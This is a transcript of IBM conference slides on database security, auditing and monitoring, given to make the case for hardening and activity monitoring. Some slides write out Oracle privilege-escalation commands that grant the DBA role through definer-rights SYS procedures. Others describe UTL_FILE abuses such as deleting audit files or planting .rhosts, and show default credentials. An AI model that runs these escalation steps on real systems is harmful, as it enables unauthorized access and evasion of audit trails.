ved du, hvor dine data er - og hvem, der har adgang til dem? ron ben natan, ibm us
DESCRIPTION
Præsentation fra Smarter Business 2012TRANSCRIPT
![Page 1: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/1.jpg)
© 2012 IBM Corporation
Database Security and Compliance
Ron Ben-Natan, IBM Distinguished Engineer
CTO for Data Security, Compliance and Optimization
![Page 2: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/2.jpg)
Database Security in the Forefront
2
Data loss prevention
Compliance requirements
Mature best practices
7 Steps
• Hardening
• Assessing
• Classifying
• Monitoring
• Auditing
• Enforcing
• Encrypting
![Page 3: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/3.jpg)
Which types of information assets are compromised?
3
![Page 4: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/4.jpg)
The “Unknown” Factor
4
![Page 5: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/5.jpg)
Scoping
Infrastructure
Database Discovery
Databases
Hosts
Applications
Requirements/Initiatives
SOXPCIDPD
Basel IIGLBA
...SecurityBreaches
Sep. of duties...
DataClassification Scope
&Technical
Requirements
Auditing
Protecting
Assessing
Discovery & Classification
5
![Page 6: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/6.jpg)
Example 1 - ANY System Privileges
6
Oracle has over 100 system privileges
Nearly every ANY system privilege can be used by an attacker to assume DBA privileges:
EXECUTE ANY PROCEDURE There are many procedures within the SYS schema that run with definer rights – so if I
can run them I can assign myself privileges exec sys.dbms_repact_sql_util.do_sql(‘grant dba to ronb’, true); exec sys.dbms_streams_rpc.execute_stmt(‘grant dba to ronb’); exec sys.ltadm.executesql(‘grant dba to ronb’);
CREATE ANY VIEW I’ll create a procedure that gives me DBA privileges running with invoker rights I’ll create a view in the SYSTEM schema that will run the procedure I’ll convince a DBA to access the view
CREATE ANY TRIGGER I’ll create a procedure that grants me DBA, running with invoker rights Pick a user with DBA privileges Pick a table within that user schema for which PUBLIC has some privileges (e.g.
SELECT) I’ll define a trigger on the privilege that PUBLIC has (e.g. SELECT) that calls the
procedure I’ll access the object (since I’m using a PUBLIC privilege) I now have DBA privileges! (the trigger runs as the schema owner)
![Page 7: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/7.jpg)
Example 2 – UTL_FILE
7
file_name := utl_file.fopen(<dir>,<file name>, ‘w’);
utl_file.put_line(file_name, ‘abcdefgh’, true);
utl_file.fclose(file_name);
The ability to write files to the OS is a very dangerous thing Runs with the database instance owner privileges Can be used to delete audit files Can be used to delete or corrupt a data file – including the SYSTEM
tablespace Can use it to change config files Can use it to write a .rhosts file to allow access to the OS Can use it to write to .cshrc or .login for the oracle OS account Can use it to write a login.sql or glogin.sql file to cause a SQL command to
be called with privileges of a DBA
![Page 8: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/8.jpg)
Assessing
ConfigurationAssessment
BehavioralAssessment
SecurityRecommendations
SecureConfiguration
Vulnerability Assessment
Scope&
TechnicalRequirements
ChangeTracking
CASProven Config
Compliance
Assessing & Securing
8
![Page 9: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/9.jpg)
“Though some movie plots would have us believe otherwise, cyber attacks in the real world rarely involve Mission Impossible-like scenarios. Quite the opposite, in fact.”
9
Complexity
![Page 10: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/10.jpg)
Example 3 - Passwords
10
Spida –
Microsoft SQL Server
Empty sa password
Xp_cmdshell
PropagationMade it to 4th place in SANS “Top Ten”
APPS/APPS
weblogic.jdbc.connectionPool.eng=\ url=jdbc:weblogic:oracle,\ driver=weblogic.jdbc.oci.Driver,\ loginDelaySecs=2,\ initialCapacity=50,\ capacityIncrement=10,\ maxCapacity=100,\ props=user=scott,password=tiger,server=ORCL
<ias-resources><jdbc> <database>ORCL</database> <datasource>ORCL</datasource> <username>scott</username> <password>tiger</password> <driver-type>ORACLE_OCI</driver-type> </jdbc></ias-resources>
Provider=SQLOLEDB;Data Source=192.168.1.32;Initial Catalog=Northwind;User ID=sa;Password=sapwd;
![Page 11: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/11.jpg)
Example 4 - Buffer Overflow Attacks
11
Sapphire worm/SQL Slammer“Zero-day attack”
![Page 12: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/12.jpg)
Monitoring & Auditing
Scope&
TechnicalRequirements
InvestigationSupport
AuditCompliance
AuditingPolicy
AuditTrails
Data AccessInvestigation
PrivilegedUser
Monitoring &Auditing
ApplicationMonitoring
Monitoring & Auditing
12
![Page 13: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/13.jpg)
Compliance – Many Regulations – Internal & External
13
![Page 14: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/14.jpg)
Breach Discovery
14
![Page 15: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/15.jpg)
15
![Page 16: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/16.jpg)
More Oracle Performance tests
16
Sun E650028 CPUs, 28 GB100 concurrent connections
Each doing inserts (real application table, with indexes etc.)100 ms delay between each insert
![Page 17: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/17.jpg)
Before Any Auditing
17
Throughout – Approximately 19,000 inserts per minute
last pid: 21715; load averages: 7.27, 4.66, 3.41 10:29:02271 processes: 269 sleeping, 2 on cpuCPU states: 66.3% idle, 25.3% user, 2.6% kernel, 5.8% iowait, 0.0% swapMemory: 26G real, 20G free, 4885M swap in use, 32G swap free
PID USERNAME LWP PRI NICE SIZE RES STATE TIME CPU COMMAND 15044 oracle10 12 49 0 2137M 965M sleep 1:17 0.34% oracle 20904 oracle10 1 59 0 2123M 970M sleep 0:15 0.31% oracle 20773 oracle10 1 39 0 2124M 971M sleep 0:16 0.31% oracle 20932 oracle10 1 59 0 2123M 970M sleep 0:14 0.31% oracle 21008 oracle10 1 59 0 2123M 971M sleep 0:13 0.31% oracle 20946 oracle10 1 59 0 2123M 971M sleep 0:13 0.31% oracle 20789 oracle10 1 59 0 2123M 970M sleep 0:16 0.30% oracle 20873 oracle10 1 59 0 2123M 971M sleep 0:15 0.30% oracle 20958 oracle10 1 54 0 2123M 971M sleep 0:13 0.30% oracle 21004 oracle10 1 59 0 2123M 970M sleep 0:13 0.30% oracle 20795 oracle10 1 59 0 2123M 970M sleep 0:15 0.30% oracle 21002 oracle10 1 59 0 2123M 971M sleep 0:13 0.30% oracle 20867 oracle10 1 53 0 2124M 972M sleep 0:15 0.29% oracle
![Page 18: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/18.jpg)
Oracle with Standard Auditing
18
Throughout – Approximately 13,000 inserts per minute30% drop in throughputLoad average almost double
last pid: 7622; load averages: 14.51, 9.90, 8.72 11:32:32271 processes: 269 sleeping, 2 on cpuCPU states: 28.2% idle, 66.5% user, 3.0% kernel, 2.3% iowait, 0.0% swapMemory: 26G real, 19G free, 4930M swap in use, 32G swap free
PID USERNAME LWP PRI NICE SIZE RES STATE TIME CPU COMMAND 4036 oracle10 1 59 0 2124M 1239M sleep 1:13 0.65% oracle 4082 oracle10 1 59 0 2124M 1239M sleep 1:12 0.65% oracle 4086 oracle10 1 59 0 2124M 1239M sleep 1:12 0.65% oracle 4055 oracle10 1 55 0 2124M 1239M sleep 1:13 0.64% oracle 4034 oracle10 1 59 0 2124M 1239M sleep 1:12 0.64% oracle 4139 oracle10 1 59 0 2124M 1239M sleep 1:12 0.64% oracle 4174 oracle10 1 53 0 2124M 1239M sleep 1:11 0.64% oracle 4162 oracle10 1 59 0 2124M 1239M sleep 1:11 0.64% oracle 3927 oracle10 1 35 0 2124M 1239M sleep 1:09 0.64% oracle 4078 oracle10 1 51 0 2124M 1239M sleep 1:09 0.63% oracle 4010 oracle10 1 59 0 2124M 1239M sleep 1:12 0.61% oracle 3947 oracle10 1 59 0 2124M 1239M sleep 1:12 0.61% oracle 3939 oracle10 1 23 0 2124M 1239M sleep 1:13 0.61% oracle 4119 oracle10 1 59 0 2124M 1239M sleep 1:10 0.61% oracle 4020 oracle10 1 41 0 2124M 1239M sleep 1:11 0.60% oracle
![Page 19: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/19.jpg)
Database Activity Monitoring - DAM
19
• Other reasons to look beyond native Auditing Heterogeneous support Easier to deploy and manage IPC interception to avoid impact to the database Functionality/Maturity
Security and AuditingAssessmentsPoliciesChange managementAudit (as opposed to auditing)
AutomationCompliance packages
Independence of the audit trail Separation of duties Allows security functions such as prevention and redaction
![Page 20: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/20.jpg)
Security Monitoring & Data Protection
Scope&
TechnicalRequirements
Violations &Incidents
AccessCompliance
Data ExtrusionProtection
Data AccessProtecttion
Monitoring &Anomaly Detection
Privileged User Access
Control
Remidiation
Protecting
20
![Page 21: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/21.jpg)
IBM Guardium - Addressing the Full Lifecycle
21
![Page 22: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/22.jpg)
Integration with LDAP/AD, IAM, Change
Management, SIEM, Archiving, etc.
Optim
Development, Test & Training
Data Center 1
Data Center 2
Data-Level Access Control (S-GATE)
Collector
Collector
Central Policy Manager & Audit
Repository
IBM System z
Host-Based Probe (S-TAP)
22
Scalable Multi-Tier Architecture
22
![Page 23: Ved du, hvor dine data er - og hvem, der har adgang til dem? Ron Ben Natan, IBM US](https://reader035.vdocument.in/reader035/viewer/2022081518/5477db6ab4af9f49288b459c/html5/thumbnails/23.jpg)
Thank you!
23